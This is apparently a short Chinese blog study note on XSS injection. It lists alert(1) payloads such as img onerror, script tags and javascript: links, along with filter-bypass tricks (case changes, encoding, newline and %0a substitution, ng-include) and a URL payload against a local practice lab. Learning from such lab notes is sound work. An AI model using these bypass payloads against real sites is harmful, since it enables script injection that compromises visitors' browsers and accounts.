首页 > 其他分享 >xss注入小节

xss注入小节

时间:2022-12-28 12:44:06浏览次数:35  
标签:xss onerror html 小节 过滤 alert type 注入

error事件
<img src="" one rror=alert(1)>
<script>alert(1)</script>
() = ``
\u003c \u003e
固定网址 加数字 one rror=alert(1)
没有匹配换行符, 可以通过换行来绕过匹配
表单无法逃避
type="image" src="" one rror=alert(1)
通过html事件跳过<>过滤
onblur 当元素失去焦点时运行脚本 type="text" 搜索框
字符串过滤 html代码可以考虑大小写 重写
xss 伪协议
<a href="javascript:alert(/xss/)" >1</a>
过滤大小写的 尝试使用url和html编码
%0a代替空格
ng-include: '调用本地文件'
http://127.0.0.1/xss/level15.php?src='level1.php?name=<img src=1 one rror=alert(1)>'
onmouseover 鼠标移动到图片上执行javascript代码
<button onclick=""> 点击按钮触发事件

标签:xss,onerror,html,小节,过滤,alert,type,注入
From: https://www.cnblogs.com/sjzdest/p/17009899.html

相关文章

  • sql注入马
    原理:利用了数据库是能够写文件的。 语法:Select'文件的内容'intooutfile'文件的路径' select'ctsz1'intooutfile'c:/WWW/ctsz1.txt' 靶场sql-注入绕过防......
  • MySql-防止注入-2022-12-27
    packagecom.kuang.lesson02;importcom.kuang.lesson02.utils.JdbcUtils;importjava.sql.Connection;importjava.util.Date;importjava.sql.PreparedStatement;import......
  • SpringBoot - 注入原生注解 Servlet,Filter,Listener
    @ServletComponentScan(basePackages=“com.atguigu.admin”)指定原生Servlet组件都放在那里@WebServlet(urlPatterns=“/my”)直接响应,没有经过Spring的拦截器@WebF......
  • JVM调优总结 -Xms -Xmx -Xmn -Xss
     java启动参数共分为三类;其一是标准参数(-),所有的JVM实现都必须实现这些参数的功能,而且向后兼容;其二是非标准参数(-X),默认jvm实现这些参数的功能,但是并不保证所有jvm实现都满足......
  • PE格式:手工实现IAT导入表注入劫持
    DLL注入有多种方式,今天介绍的这一种注入方式是通过修改导入表,增加一项导入DLL以及导入函数,我们知道当程序在被运行起来之前,其导入表中的导入DLL与导入函数会被递归读取加载......
  • 从发现SQL注入到ssh连接
    前言:某天,同事扔了一个教育站点过来,里面的url看起来像有SQL注入。正好最近手痒痒,就直接开始。一、发现时间盲注和源码后面发现他发的url是不存在SQL注入的,但是我在其他地......
  • Spring之Bean注入Spring容器中的方式
     向spring容器中加入bean有以下方式:通过<Bean>标签@Configuration+@Bean@Component+组件扫描@Import导入【见 Spring注解之@Import】实现FactoryB......
  • 报错注入
    不是我不想,你上学我上班,我耽误你前程似锦,你耽误我成家立业,我的眼里都是烟花和生活,你的眼里都是未来和希望。。。---- 网易云热评一、相关函数1、rand():产生一个0-1之间随......
  • 宽字节注入讲解
    我讨厌现在的自己,一边压抑着自己的情绪,一边装作没事的样子,一到深夜就彻底崩溃了,天亮后还要微笑面对生活。。。---- 网易云热评一、原理1、单字节字符集:所有的字符都使用......
  • 12、报错注入(Post)
    环境sqli-labsless11如何抓取数据包看抓包工具–burpsuite(Repeater功能)一、抓包,发送到Repeater二、修改我们提交的数据,go,返回信息如下三、我们试着闭合,并返回一个......